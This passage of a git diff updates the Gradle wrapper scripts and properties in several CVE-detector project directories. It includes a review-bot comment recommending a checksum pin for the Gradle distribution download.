@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/jira_cve_2022_0540/gradlew.bat b/community/detectors/jira_cve_2022_0540/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/jira_cve_2022_0540/gradlew.bat +++ b/community/detectors/jira_cve_2022_0540/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.jar b/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.properties b/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/laravel_cve_2021_3129/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/laravel_cve_2021_3129/gradlew b/community/detectors/laravel_cve_2021_3129/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/laravel_cve_2021_3129/gradlew +++ b/community/detectors/laravel_cve_2021_3129/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
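Review bot: The updated wrapper configuration still fetches `gradle-7.0-bin.zip` without an integrity pin: this hunk adds `networkTimeout` and `validateDistributionUrl` but no `distributionSha256Sum`, so the wrapper accepts whatever archive the URL serves. I would add `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip as published by Gradle>` directly below the `distributionUrl` line; `validateDistributionUrl=true` appears to check only the URL, not the archive contents. The same hunk is repeated for `community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.properties` and `community/detectors/metabase_cve_2023_38646/gradle/wrapper/gradle-wrapper.properties`. Because `gradle-wrapper.jar` is replaced as an opaque binary in the same change, its checksum is worth comparing against Gradle's published wrapper checksums before merging.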
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/laravel_cve_2021_3129/gradlew.bat b/community/detectors/laravel_cve_2021_3129/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/laravel_cve_2021_3129/gradlew.bat +++ b/community/detectors/laravel_cve_2021_3129/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.jar b/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/metabase_cve_2021_41277/gradle/wrapper/gradle-wrapper.properties 